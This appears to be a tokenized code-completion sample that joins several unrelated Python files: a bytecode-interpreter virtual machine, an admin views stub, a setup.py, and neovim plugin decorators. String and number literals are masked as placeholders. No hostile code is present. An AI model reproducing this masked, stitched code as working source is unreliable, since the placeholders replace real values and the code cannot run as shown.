'<STR_LIT:U+0020>' + line . strip ( ) ) <EOL> def resume_frame ( self , frame ) : <EOL> frame . f_back = self . frame <EOL> val = self . run_frame ( frame ) <EOL> frame . f_back = None <EOL> return val <EOL> def run_code ( self , code , f_globals = None , f_locals = None ) : <EOL> frame = self . make_frame ( code , f_globals = f_globals , f_locals = f_locals ) <EOL> val = self . run_frame ( frame ) <EOL> if self . frames : <EOL> raise VirtualMachineError ( "<STR_LIT>" ) <EOL> if self . frame and self . frame . stack : <EOL> raise VirtualMachineError ( "<STR_LIT>" % self . frame . stack ) <EOL> return val <EOL> def unwind_block ( self , block ) : <EOL> if block . type == '<STR_LIT>' : <EOL> offset = <NUM_LIT:3> <EOL> else : <EOL> offset = <NUM_LIT:0> <EOL> while len ( self . frame . stack ) > block . level + offset : <EOL> self . pop ( ) <EOL> if block . type == '<STR_LIT>' : <EOL> tb , value , exctype = self . popn ( <NUM_LIT:3> ) <EOL> self . last_exception = exctype , value , tb <EOL> def parse_byte_and_args ( self ) : <EOL> """<STR_LIT>""" <EOL> f = self . frame <EOL> opoffset = f . f_lasti <EOL> byteCode = byteint ( f . f_code . co_code [ opoffset ] ) <EOL> f . f_lasti += <NUM_LIT:1> <EOL> byteName = dis . opname [ byteCode ] <EOL> arg = None <EOL> arguments = [ ] <EOL> if byteCode >= dis . HAVE_ARGUMENT : <EOL> arg = f . f_code . co_code [ f . f_lasti : f . f_lasti + <NUM_LIT:2> ] <EOL> f . f_lasti += <NUM_LIT:2> <EOL> intArg = byteint ( arg [ <NUM_LIT:0> ] ) + ( byteint ( arg [ <NUM_LIT:1> ] ) << <NUM_LIT:8> ) <EOL> if byteCode in dis . hasconst : <EOL> arg = f . f_code . co_consts [ intArg ] <EOL> elif byteCode in dis . hasfree : <EOL> if intArg < len ( f . f_code . co_cellvars ) : <EOL> arg = f . f_code . co_cellvars [ intArg ] <EOL> else : <EOL> var_idx = intArg - len ( f . f_code . co_cellvars ) <EOL> arg = f . f_code . co_freevars [ var_idx ] <EOL> elif byteCode in dis . hasname : <EOL> arg = f . f_code . co_names [ intArg ] <EOL> elif byteCode in dis . hasjrel : <EOL> arg = f . f_lasti + intArg <EOL> elif byteCode in dis . hasjabs : <EOL> arg = intArg <EOL> elif byteCode in dis . haslocal : <EOL> arg = f . f_code . co_varnames [ intArg ] <EOL> else : <EOL> arg = intArg <EOL> arguments = [ arg ] <EOL> return byteName , arguments , opoffset <EOL> def log ( self , byteName , arguments , opoffset ) : <EOL> """<STR_LIT>""" <EOL> op = "<STR_LIT>" % ( opoffset , byteName ) <EOL> if arguments : <EOL> op += "<STR_LIT>" % ( arguments [ <NUM_LIT:0> ] , ) <EOL> indent = "<STR_LIT:U+0020>" * ( len ( self . frames ) - <NUM_LIT:1> ) <EOL> stack_rep = repper ( self . frame . stack ) <EOL> block_stack_rep = repper ( self . frame . block_stack ) <EOL> log . info ( "<STR_LIT>" % ( indent , stack_rep ) ) <EOL> log . info ( "<STR_LIT>" % ( indent , block_stack_rep ) ) <EOL> log . info ( "<STR_LIT>" % ( indent , op ) ) <EOL> def dispatch ( self , byteName , arguments ) : <EOL> """<STR_LIT>""" <EOL> why = None <EOL> try : <EOL> if byteName . startswith ( '<STR_LIT>' ) : <EOL> self . unaryOperator ( byteName [ <NUM_LIT:6> : ] ) <EOL> elif byteName . startswith ( '<STR_LIT>' ) : <EOL> self . binaryOperator ( byteName [ <NUM_LIT:7> : ] ) <EOL> elif byteName . startswith ( '<STR_LIT>' ) : <EOL> self . inplaceOperator ( byteName [ <NUM_LIT:8> : ] ) <EOL> elif '<STR_LIT>' in byteName : <EOL> self . sliceOperator ( byteName ) <EOL> else : <EOL> bytecode_fn = getattr ( self , '<STR_LIT>' % byteName , None ) <EOL> if not bytecode_fn : <EOL> raise VirtualMachineError ( <EOL> "<STR_LIT>" % byteName <EOL> ) <EOL> why = bytecode_fn ( * arguments ) <EOL> except : <EOL> self . last_exception = sys . exc_info ( ) [ : <NUM_LIT:2> ] + ( None , ) <EOL> log . exception ( "<STR_LIT>" ) <EOL> why = '<STR_LIT>' <EOL> return why <EOL> def manage_block_stack ( self , why ) : <EOL> """<STR_LIT>""" <EOL> assert why != '<STR_LIT>' <EOL> block = self . frame . block_stack [ - <NUM_LIT:1> ] <EOL> if block . type == '<STR_LIT>' and why == '<STR_LIT>' : <EOL> self . jump ( self . return_value ) <EOL> why = None <EOL> return why <EOL> self . pop_block ( ) <EOL> self . unwind_block ( block ) <EOL> if block . type == '<STR_LIT>' and why == '<STR_LIT>' : <EOL> why = None <EOL> self . jump ( block . handler ) <EOL> return why <EOL> if PY2 : <EOL> if ( <EOL> block . type == '<STR_LIT>' or <EOL> ( block . type == '<STR_LIT>' and why == '<STR_LIT>' ) or <EOL> block . type == '<STR_LIT>' <EOL> ) : <EOL> if why == '<STR_LIT>' : <EOL> exctype , value , tb = self . last_exception <EOL> self . push ( tb , value , exctype ) <EOL> else : <EOL> if why in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . push ( self . return_value ) <EOL> self . push ( why ) <EOL> why = None <EOL> self . jump ( block . handler ) <EOL> return why <EOL> elif PY3 : <EOL> if ( <EOL> why == '<STR_LIT>' and <EOL> block . type in [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) : <EOL> self . push_block ( '<STR_LIT>' ) <EOL> exctype , value , tb = self . last_exception <EOL> self . push ( tb , value , exctype ) <EOL> self . push ( tb , value , exctype ) <EOL> why = None <EOL> self . jump ( block . handler ) <EOL> return why <EOL> elif block . type == '<STR_LIT>' : <EOL> if why in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . push ( self . return_value ) <EOL> self . push ( why ) <EOL> why = None <EOL> self . jump ( block . handler ) <EOL> return why <EOL> return why <EOL> def run_frame ( self , frame ) : <EOL> """<STR_LIT>""" <EOL> self . push_frame ( frame ) <EOL> while True : <EOL> byteName , arguments , opoffset = self . parse_byte_and_args ( ) <EOL> if log . isEnabledFor ( logging . INFO ) : <EOL> self . log ( byteName , arguments , opoffset ) <EOL> why = self . dispatch ( byteName , arguments ) <EOL> if why == '<STR_LIT>' : <EOL> pass <EOL> if why == '<STR_LIT>' : <EOL> why = '<STR_LIT>' <EOL> if why != '<STR_LIT>' : <EOL> while why and frame . block_stack : <EOL> why = self . manage_block_stack ( why ) <EOL> if why : <EOL> break <EOL> self . pop_frame ( ) <EOL> if why == '<STR_LIT>' : <EOL> six . reraise ( * self . last_exception ) <EOL> return self . return_value <EOL> def byte_LOAD_CONST ( self , const ) : <EOL> self . push ( const ) <EOL> def byte_POP_TOP ( self ) : <EOL> self . pop ( ) <EOL> def byte_DUP_TOP ( self ) : <EOL> self . push ( self . top ( ) ) <EOL> def byte_DUP_TOPX ( self , count ) : <EOL> items = self . popn ( count ) <EOL> for i in [ <NUM_LIT:1> , <NUM_LIT:2> ] : <EOL> self . push ( * items ) <EOL> def byte_DUP_TOP_TWO ( self ) : <EOL> a , b = self . popn ( <NUM_LIT:2> ) <EOL> self . push ( a , b , a , b ) <EOL> def byte_ROT_TWO ( self ) : <EOL> a , b = self . popn ( <NUM_LIT:2> ) <EOL> self . push ( b , a ) <EOL> def byte_ROT_THREE ( self ) : <EOL> a , b , c = self . popn ( <NUM_LIT:3> ) <EOL> self . push ( c , a , b ) <EOL> def byte_ROT_FOUR ( self ) : <EOL> a , b , c , d = self . popn ( <NUM_LIT:4> ) <EOL> self . push ( d , a , b , c ) <EOL> def byte_LOAD_NAME ( self , name ) : <EOL> frame = self . frame <EOL> if name in frame . f_locals : <EOL> val = frame . f_locals [ name ] <EOL> elif name in frame . f_globals : <EOL> val = frame . f_globals [ name ] <EOL> elif name in frame . f_builtins : <EOL> val = frame . f_builtins [ name ] <EOL> else : <EOL> raise NameError ( "<STR_LIT>" % name ) <EOL> self . push ( val ) <EOL> def byte_STORE_NAME ( self , name ) : <EOL> self . frame . f_locals [ name ] = self . pop ( ) <EOL> def byte_DELETE_NAME ( self , name ) : <EOL> del self . frame . f_locals [ name ] <EOL> def byte_LOAD_FAST ( self , name ) : <EOL> if name in self . frame . f_locals : <EOL> val = self . frame . f_locals [ name ] <EOL> else : <EOL> raise UnboundLocalError ( <EOL> "<STR_LIT>" % name <EOL> ) <EOL> self . push ( val ) <EOL> def byte_STORE_FAST ( self , name ) : <EOL> self . frame . f_locals [ name ] = self . pop ( ) <EOL> def byte_DELETE_FAST ( self , name ) : <EOL> del self . frame . f_locals [ name ] <EOL> def byte_LOAD_GLOBAL ( self , name ) : <EOL> f = self . frame <EOL> if name in f . f_globals : <EOL> val = f . f_globals [ name ] <EOL> elif name in f . f_builtins : <EOL> val = f . f_builtins [ name ] <EOL> else : <EOL> raise NameError ( "<STR_LIT>" % name ) <EOL> self . push ( val ) <EOL> def byte_LOAD_DEREF ( self , name ) : <EOL> self . push ( self . frame . cells [ name ] . get ( ) ) <EOL> def byte_STORE_DEREF ( self , name ) : <EOL> self . frame . cells [ name ] . set ( self . pop ( ) ) <EOL> def byte_LOAD_LOCALS ( self ) : <EOL> self . push ( self . frame . f_locals ) <EOL> UNARY_OPERATORS = { <EOL> '<STR_LIT>' : operator . pos , <EOL> '<STR_LIT>' : operator . neg , <EOL> '<STR_LIT>' : operator . not_ , <EOL> '<STR_LIT>' : repr , <EOL> '<STR_LIT>' : operator . invert , <EOL> } <EOL> def unaryOperator ( self , op ) : <EOL> x = self . pop ( ) <EOL> self . push ( self . UNARY_OPERATORS [ op ] ( x ) ) <EOL> BINARY_OPERATORS = { <EOL> '<STR_LIT>' : pow , <EOL> '<STR_LIT>' : operator . mul , <EOL> '<STR_LIT>' : getattr ( operator , '<STR_LIT>' , lambda x , y : None ) , <EOL> '<STR_LIT>' : operator . floordiv , <EOL> '<STR_LIT>' : operator . truediv , <EOL> '<STR_LIT>' : operator . mod , <EOL> '<STR_LIT>' : operator . add , <EOL> '<STR_LIT>' : operator . sub , <EOL> '<STR_LIT>' : operator . getitem , <EOL> '<STR_LIT>' : operator . lshift , <EOL> '<STR_LIT>' : operator . rshift , <EOL> '<STR_LIT>' : operator . and_ , <EOL> '<STR_LIT>' : operator . xor , <EOL> '<STR_LIT>' : operator . or_ , <EOL> } <EOL> def binaryOperator ( self , op ) : <EOL> x , y = self . popn ( <NUM_LIT:2> ) <EOL> self . push ( self . BINARY_OPERATORS [ op ] ( x , y ) ) <EOL> def inplaceOperator ( self , op ) : <EOL> x , y = self . popn ( <NUM_LIT:2> ) <EOL> if op == '<STR_LIT>' : <EOL> x **= y <EOL> elif op == '<STR_LIT>' : <EOL> x *= y <EOL> elif op in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> x //= y <EOL> elif op == '<STR_LIT>' : <EOL> x /= y <EOL> elif op == '<STR_LIT>' : <EOL> x %= y <EOL> elif op == '<STR_LIT>' : <EOL> x += y <EOL> elif op == '<STR_LIT>' : <EOL> x -= y <EOL> elif op == '<STR_LIT>' : <EOL> x <<= y <EOL> elif op == '<STR_LIT>' : <EOL> x >>= y <EOL> elif op == '<STR_LIT>' : <EOL> x &= y <EOL> elif op == '<STR_LIT>' : <EOL> x ^= y <EOL> elif op == '<STR_LIT>' : <EOL> x |= y <EOL> else : <EOL> raise VirtualMachineError ( "<STR_LIT>" % op ) <EOL> self . push ( x ) <EOL> def sliceOperator ( self , op ) : <EOL> start = <NUM_LIT:0> <EOL> end = None <EOL> op , count = op [ : - <NUM_LIT:2> ] , int ( op [ - <NUM_LIT:1> ] ) <EOL> if count == <NUM_LIT:1> : <EOL> start = self . pop ( ) <EOL> elif count == <NUM_LIT:2> : <EOL> end = self . pop ( ) <EOL> elif count == <NUM_LIT:3> : <EOL> end = self . pop ( ) <EOL> start = self . pop ( ) <EOL> l = self . pop ( ) <EOL> if end is None : <EOL> end = len ( l ) <EOL> if op . startswith ( '<STR_LIT>' ) : <EOL> l [ start : end ] = self . pop ( ) <EOL> elif op . startswith ( '<STR_LIT>' ) : <EOL> del l [ start : end ] <EOL> else : <EOL> self . push ( l [ start : end ] ) <EOL> COMPARE_OPERATORS = [ <EOL> operator . lt , <EOL> operator . le , <EOL> operator . eq , <EOL> operator . ne , <EOL> operator . gt , <EOL> operator . ge , <EOL> lambda x , y : x in y , <EOL> lambda x , y : x not in y , <EOL> lambda x , y : x is y , <EOL> lambda x , y : x is not y , <EOL> lambda x , y : issubclass ( x , Exception ) and issubclass ( x , y ) , <EOL> ] <EOL> def byte_COMPARE_OP ( self , opnum ) : <EOL> x , y = self . popn ( <NUM_LIT:2> ) <EOL> self . push ( self . COMPARE_OPERATORS [ opnum ] ( x , y ) ) <EOL> def byte_LOAD_ATTR ( self , attr ) : <EOL> obj = self . pop ( ) <EOL> val = getattr ( obj , attr ) <EOL> self . push ( val ) <EOL> def byte_STORE_ATTR ( self , name ) : <EOL> val , obj = self . popn ( <NUM_LIT:2> ) <EOL> setattr ( obj , name , val ) <EOL> def byte_DELETE_ATTR ( self , name ) : <EOL> obj = self . pop ( ) <EOL> delattr ( obj , name ) <EOL> def byte_STORE_SUBSCR ( self ) : <EOL> val , obj , subscr = self . popn ( <NUM_LIT:3> ) <EOL> obj [ subscr ] = val <EOL> def byte_DELETE_SUBSCR ( self ) : <EOL> obj , subscr = self . popn ( <NUM_LIT:2> ) <EOL> del obj [ subscr ] <EOL> def byte_BUILD_TUPLE ( self , count ) : <EOL> elts = self . popn ( count ) <EOL> self . push ( tuple ( elts ) ) <EOL> def byte_BUILD_LIST ( self , count ) : <EOL> elts = self . popn ( count ) <EOL> self . push ( elts ) <EOL> def byte_BUILD_SET ( self , count ) : <EOL> elts = self . popn ( count ) <EOL> self . push ( set ( elts ) ) <EOL> def byte_BUILD_MAP ( self , size ) : <EOL> self . push ( { } ) <EOL> def byte_STORE_MAP ( self ) : <EOL> the_map , val , key = self . popn ( <NUM_LIT:3> ) <EOL> the_map [ key ] = val <EOL> self . push ( the_map ) <EOL> def byte_UNPACK_SEQUENCE ( self , count ) : <EOL> seq = self . pop ( ) <EOL> for x in reversed ( seq ) : <EOL> self . push ( x ) <EOL> def byte_BUILD_SLICE ( self , count ) : <EOL> if count == <NUM_LIT:2> : <EOL> x , y = self . popn ( <NUM_LIT:2> ) <EOL> self . push ( slice ( x , y ) ) <EOL> elif count == <NUM_LIT:3> : <EOL> x , y , z = self . popn ( <NUM_LIT:3> ) <EOL> self . push ( slice ( x , y , z ) ) <EOL> else : <EOL> raise VirtualMachineError ( "<STR_LIT>" % count ) <EOL> def byte_LIST_APPEND ( self , count ) : <EOL> val = self . pop ( ) <EOL> the_list = self . peek ( count ) <EOL> the_list . append ( val ) <EOL> def byte_SET_ADD ( self , count ) : <EOL> val = self . pop ( ) <EOL> the_set = self . peek ( count ) <EOL> the_set . add ( val ) <EOL> def byte_MAP_ADD ( self , count ) : <EOL> val , key = self . popn ( <NUM_LIT:2> ) <EOL> the_map = self . peek ( count ) <EOL> the_map [ key ] = val <EOL> if <NUM_LIT:0> : <EOL> def byte_PRINT_EXPR ( self ) : <EOL> print ( self . pop ( ) ) <EOL> def byte_PRINT_ITEM ( self ) : <EOL> item = self . pop ( ) <EOL> self . print_item ( item ) <EOL> def byte_PRINT_ITEM_TO ( self ) : <EOL> to = self . pop ( ) <EOL> item = self . pop ( ) <EOL> self . print_item ( item , to ) <EOL> def byte_PRINT_NEWLINE ( self ) : <EOL> self . print_newline ( ) <EOL> def byte_PRINT_NEWLINE_TO ( self ) : <EOL> to = self . pop ( ) <EOL> self . print_newline ( to ) <EOL> def print_item ( self , item , to = None ) : <EOL> if to is None : <EOL> to = sys . stdout <EOL> if to . softspace : <EOL> print ( "<STR_LIT:U+0020>" , end = "<STR_LIT>" , file = to ) <EOL> to . softspace = <NUM_LIT:0> <EOL> print ( item , end = "<STR_LIT>" , file = to ) <EOL> if isinstance ( item , str ) : <EOL> if ( not item ) or ( not item [ - <NUM_LIT:1> ] . isspace ( ) ) or ( item [ - <NUM_LIT:1> ] == "<STR_LIT:U+0020>" ) : <EOL> to . softspace = <NUM_LIT:1> <EOL> else : <EOL> to . softspace = <NUM_LIT:1> <EOL> def print_newline ( self , to = None ) : <EOL> if to is None : <EOL> to = sys . stdout <EOL> print ( "<STR_LIT>" , file = to ) <EOL> to . softspace = <NUM_LIT:0> <EOL> def byte_JUMP_FORWARD ( self , jump ) : <EOL> self . jump ( jump ) <EOL> def byte_JUMP_ABSOLUTE ( self , jump ) : <EOL> self . jump ( jump ) <EOL> if <NUM_LIT:0> : <EOL> def byte_JUMP_IF_TRUE ( self , jump ) : <EOL> val = self . top ( ) <EOL> if val : <EOL> self . jump ( jump ) <EOL> def byte_JUMP_IF_FALSE ( self , jump ) : <EOL> val = self . top ( ) <EOL> if not val : <EOL> self . jump ( jump ) <EOL> def byte_POP_JUMP_IF_TRUE ( self , jump ) : <EOL> val = self . pop ( ) <EOL> if val : <EOL> self . jump ( jump ) <EOL> def byte_POP_JUMP_IF_FALSE ( self , jump ) : <EOL> val = self . pop ( ) <EOL> if not val : <EOL> self . jump ( jump ) <EOL> def byte_JUMP_IF_TRUE_OR_POP ( self , jump ) : <EOL> val = self . top ( ) <EOL> if val : <EOL> self . jump ( jump ) <EOL> else : <EOL> self . pop ( ) <EOL> def byte_JUMP_IF_FALSE_OR_POP ( self , jump ) : <EOL> val = self . top ( ) <EOL> if not val : <EOL> self . jump ( jump ) <EOL> else : <EOL> self . pop ( ) <EOL> def byte_SETUP_LOOP ( self , dest ) : <EOL> self . push_block ( '<STR_LIT>' , dest ) <EOL> def byte_GET_ITER ( self ) : <EOL> self . push ( iter ( self . pop ( ) ) ) <EOL> def byte_FOR_ITER ( self , jump ) : <EOL> iterobj = self . top ( ) <EOL> try : <EOL> v = next ( iterobj ) <EOL> self . push ( v ) <EOL> except StopIteration : <EOL> self . pop ( ) <EOL> self . jump ( jump ) <EOL> def byte_BREAK_LOOP ( self ) : <EOL> return '<STR_LIT>' <EOL> def byte_CONTINUE_LOOP ( self , dest ) : <EOL> self . return_value = dest <EOL> return '<STR_LIT>' <EOL> def byte_SETUP_EXCEPT ( self , dest ) : <EOL> self . push_block ( '<STR_LIT>' , dest ) <EOL> def byte_SETUP_FINALLY ( self , dest ) : <EOL> self . push_block ( '<STR_LIT>' , dest ) <EOL> def byte_END_FINALLY ( self ) : <EOL> v = self . pop ( ) <EOL> if isinstance ( v , str ) : <EOL> why = v <EOL> if why in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . return_value = self . pop ( ) <EOL> if why == '<STR_LIT>' : <EOL> block = self . pop_block ( ) <EOL> assert block . type == '<STR_LIT>' <EOL> self . unwind_block ( block ) <EOL> why = None <EOL> elif v is None : <EOL> why = None <EOL> elif issubclass ( v , BaseException ) : <EOL> exctype = v <EOL> val = self . pop ( ) <EOL> tb = self . pop ( ) <EOL> self . last_exception = ( exctype , val , tb ) <EOL> why = '<STR_LIT>' <EOL> else : <EOL> raise VirtualMachineError ( "<STR_LIT>" ) <EOL> return why <EOL> def byte_POP_BLOCK ( self ) : <EOL> self . pop_block ( ) <EOL> if PY2 : <EOL> def byte_RAISE_VARARGS ( self , argc ) : <EOL> exctype = val = tb = None <EOL> if argc == <NUM_LIT:0> : <EOL> exctype , val , tb = self . last_exception <EOL> elif argc == <NUM_LIT:1> : <EOL> exctype = self . pop ( ) <EOL> elif argc == <NUM_LIT:2> : <EOL> val = self . pop ( ) <EOL> exctype = self . pop ( ) <EOL> elif argc == <NUM_LIT:3> : <EOL> tb = self . pop ( ) <EOL> val = self . pop ( ) <EOL> exctype = self . pop ( ) <EOL> if isinstance ( exctype , BaseException ) : <EOL> val = exctype <EOL> exctype = type ( val ) <EOL> self . last_exception = ( exctype , val , tb ) <EOL> if tb : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return '<STR_LIT>' <EOL> elif PY3 : <EOL> def byte_RAISE_VARARGS ( self , argc ) : <EOL> cause = exc = None <EOL> if argc == <NUM_LIT:2> : <EOL> cause = self . pop ( ) <EOL> exc = self . pop ( ) <EOL> elif argc == <NUM_LIT:1> : <EOL> exc = self . pop ( ) <EOL> return self . do_raise ( exc , cause ) <EOL> def do_raise ( self , exc , cause ) : <EOL> if exc is None : <EOL> exc_type , val , tb = self . last_exception <EOL> if exc_type is None : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return '<STR_LIT>' <EOL> elif type ( exc ) == type : <EOL> exc_type = exc <EOL> val = exc ( ) <EOL> elif isinstance ( exc , BaseException ) : <EOL> exc_type = type ( exc ) <EOL> val = exc <EOL> else : <EOL> return '<STR_LIT>' <EOL> if cause : <EOL> if type ( cause ) == type : <EOL> cause = cause ( ) <EOL> elif not isinstance ( cause , BaseException ) : <EOL> return '<STR_LIT>' <EOL> val . __cause__ = cause <EOL> self . last_exception = exc_type , val , val . __traceback__ <EOL> return '<STR_LIT>' <EOL> def byte_POP_EXCEPT ( self ) : <EOL> block = self . pop_block ( ) <EOL> if block . type != '<STR_LIT>' : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> self . unwind_block ( block ) <EOL> def byte_SETUP_WITH ( self , dest ) : <EOL> ctxmgr = self . pop ( ) <EOL> self . push ( ctxmgr . __exit__ ) <EOL> ctxmgr_obj = ctxmgr . __enter__ ( ) <EOL> if PY2 : <EOL> self . push_block ( '<STR_LIT>' , dest ) <EOL> elif PY3 : <EOL> self . push_block ( '<STR_LIT>' , dest ) <EOL> self . push ( ctxmgr_obj ) <EOL> def byte_WITH_CLEANUP ( self ) : <EOL> v = w = None <EOL> u = self . top ( ) <EOL> if u is None : <EOL> exit_func = self . pop ( <NUM_LIT:1> ) <EOL> elif isinstance ( u , str ) : <EOL> if u in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> exit_func = self . pop ( <NUM_LIT:2> ) <EOL> else : <EOL> exit_func = self . pop ( <NUM_LIT:1> ) <EOL> u = None <EOL> elif issubclass ( u , BaseException ) : <EOL> if PY2 : <EOL> w , v , u = self . popn ( <NUM_LIT:3> ) <EOL> exit_func = self . pop ( ) <EOL> self . push ( w , v , u ) <EOL> elif PY3 : <EOL> w , v , u = self . popn ( <NUM_LIT:3> ) <EOL> tp , exc , tb = self . popn ( <NUM_LIT:3> ) <EOL> exit_func = self . pop ( ) <EOL> self . push ( tp , exc , tb ) <EOL> self . push ( None ) <EOL> self . push ( w , v , u ) <EOL> block = self . pop_block ( ) <EOL> assert block . type == '<STR_LIT>' <EOL> self . push_block ( block . type , block . handler , block . level - <NUM_LIT:1> ) <EOL> else : <EOL> raise VirtualMachineError ( "<STR_LIT>" ) <EOL> exit_ret = exit_func ( u , v , w ) <EOL> err = ( u is not None ) and bool ( exit_ret ) <EOL> if err : <EOL> if PY2 : <EOL> self . popn ( <NUM_LIT:3> ) <EOL> self . push ( None ) <EOL> elif PY3 : <EOL> self . push ( '<STR_LIT>' ) <EOL> def byte_MAKE_FUNCTION ( self , argc ) : <EOL> if PY3 : <EOL> name = self . pop ( ) <EOL> else : <EOL> name = None <EOL> code = self . pop ( ) <EOL> defaults = self . popn ( argc ) <EOL> globs = self . frame . f_globals <EOL> fn = Function ( name , code , globs , defaults , None , self ) <EOL> self . push ( fn ) <EOL> def byte_LOAD_CLOSURE ( self , name ) : <EOL> self . push ( self . frame . cells [ name ] ) <EOL> def byte_MAKE_CLOSURE ( self , argc ) : <EOL> if PY3 : <EOL> name = self . pop ( ) <EOL> else : <EOL> name = None <EOL> closure , code = self . popn ( <NUM_LIT:2> ) <EOL> defaults = self . popn ( argc ) <EOL> globs = self . frame . f_globals <EOL> fn = Function ( name , code , globs , defaults , closure , self ) <EOL> self . push ( fn ) <EOL> def byte_CALL_FUNCTION ( self , arg ) : <EOL> return self . call_function ( arg , [ ] , { } ) <EOL> def byte_CALL_FUNCTION_VAR ( self , arg ) : <EOL> args = self . pop ( ) <EOL> return self . call_function ( arg , args , { } ) <EOL> def byte_CALL_FUNCTION_KW ( self , arg ) : <EOL> kwargs = self . pop ( ) <EOL> return self . call_function ( arg , [ ] , kwargs ) <EOL> def byte_CALL_FUNCTION_VAR_KW ( self , arg ) : <EOL> args , kwargs = self . popn ( <NUM_LIT:2> ) <EOL> return self . call_function ( arg , args , kwargs ) <EOL> def call_function ( self , arg , args , kwargs ) : <EOL> lenKw , lenPos = divmod ( arg , <NUM_LIT> ) <EOL> namedargs = { } <EOL> for i in range ( lenKw ) : <EOL> key , val = self . popn ( <NUM_LIT:2> ) <EOL> namedargs [ key ] = val <EOL> namedargs . update ( kwargs ) <EOL> posargs = self . popn ( lenPos ) <EOL> posargs . extend ( args ) <EOL> func = self . pop ( ) <EOL> frame = self . frame <EOL> if hasattr ( func , '<STR_LIT>' ) : <EOL> if func . im_self : <EOL> posargs . insert ( <NUM_LIT:0> , func . im_self ) <EOL> if not isinstance ( posargs [ <NUM_LIT:0> ] , func . im_class ) : <EOL> raise TypeError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( <EOL> func . im_func . func_name , <EOL> func . im_class . __name__ , <EOL> type ( posargs [ <NUM_LIT:0> ] ) . __name__ , <EOL> ) <EOL> ) <EOL> func = func . im_func <EOL> retval = func ( * posargs , ** namedargs ) <EOL> self . push ( retval ) <EOL> def byte_RETURN_VALUE ( self ) : <EOL> self . return_value = self . pop ( ) <EOL> if self . frame . generator : <EOL> self . frame . generator . finished = True <EOL> return "<STR_LIT>" <EOL> def byte_YIELD_VALUE ( self ) : <EOL> self . return_value = self . pop ( ) <EOL> return "<STR_LIT>" <EOL> def byte_YIELD_FROM ( self ) : <EOL> u = self . pop ( ) <EOL> x = self . top ( ) <EOL> try : <EOL> if not isinstance ( x , Generator ) or u is None : <EOL> retval = next ( x ) <EOL> else : <EOL> retval = x . send ( u ) <EOL> self . return_value = retval <EOL> except StopIteration as e : <EOL> self . pop ( ) <EOL> self . push ( e . value ) <EOL> else : <EOL> self . jump ( self . frame . f_lasti - <NUM_LIT:1> ) <EOL> return "<STR_LIT>" <EOL> def byte_IMPORT_NAME ( self , name ) : <EOL> level , fromlist = self . popn ( <NUM_LIT:2> ) <EOL> frame = self . frame <EOL> self . push ( <EOL> __import__ ( name , frame . f_globals , frame . f_locals , fromlist , level ) <EOL> ) <EOL> def byte_IMPORT_STAR ( self ) : <EOL> mod = self . pop ( ) <EOL> for attr in dir ( mod ) : <EOL> if attr [ <NUM_LIT:0> ] != '<STR_LIT:_>' : <EOL> self . frame . f_locals [ attr ] = getattr ( mod , attr ) <EOL> def byte_IMPORT_FROM ( self , name ) : <EOL> mod = self . top ( ) <EOL> self . push ( getattr ( mod , name ) ) <EOL> def byte_EXEC_STMT ( self ) : <EOL> stmt , globs , locs = self . popn ( <NUM_LIT:3> ) <EOL> six . exec_ ( stmt , globs , locs ) <EOL> if PY2 : <EOL> def byte_BUILD_CLASS ( self ) : <EOL> name , bases , methods = self . popn ( <NUM_LIT:3> ) <EOL> self . push ( type ( name , bases , methods ) ) <EOL> elif PY3 : <EOL> def byte_LOAD_BUILD_CLASS ( self ) : <EOL> self . push ( __build_class__ ) <EOL> def byte_STORE_LOCALS ( self ) : <EOL> self . frame . f_locals = self . pop ( ) <EOL> if <NUM_LIT:0> : <EOL> def byte_SET_LINENO ( self , lineno ) : <EOL> self . frame . f_lineno = lineno </s>
<s> _admin_views_code = '''<STR_LIT>''' </s>
<s> """<STR_LIT>""" <EOL> from setuptools import setup , find_packages <EOL> import mana <EOL> version = <NUM_LIT> <EOL> entry_points = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' <EOL> ] <EOL> } <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = version , <EOL> packages = find_packages ( ) , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = __doc__ , <EOL> zip_safe = False , <EOL> include_package_data = True , <EOL> platforms = '<STR_LIT>' , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> entry_points = entry_points , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import inspect <EOL> import logging <EOL> from . . compat import IS_PYTHON3 <EOL> logger = logging . getLogger ( __name__ ) <EOL> debug , info , warn = ( logger . debug , logger . info , logger . warning , ) <EOL> __all__ = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def plugin ( cls ) : <EOL> """<STR_LIT>""" <EOL> cls . _nvim_plugin = True <EOL> predicate = lambda fn : hasattr ( fn , '<STR_LIT>' ) <EOL> for _ , fn in inspect . getmembers ( cls , predicate ) : <EOL> if IS_PYTHON3 : <EOL> fn . _nvim_bind = False <EOL> else : <EOL> fn . im_func . _nvim_bind = False <EOL> return cls <EOL> def rpc_export ( rpc_method_name , sync = False ) : <EOL> """<STR_LIT>""" <EOL> def dec ( f ) : <EOL> f . _nvim_rpc_method_name = rpc_method_name <EOL> f . _nvim_rpc_sync = sync <EOL> f . _nvim_bind = True <EOL> f . _nvim_prefix_plugin_path = False <EOL> return f <EOL> return dec <EOL> def command ( name , nargs = <NUM_LIT:0> , complete = None , range = None , count = None , bang = False , <EOL> register = False , sync = False , eval = None ) : <EOL> """<STR_LIT>""" <EOL> def dec ( f ) : <EOL> f . _nvim_rpc_method_name = '<STR_LIT>' . format ( name ) <EOL> f . _nvim_rpc_sync = sync 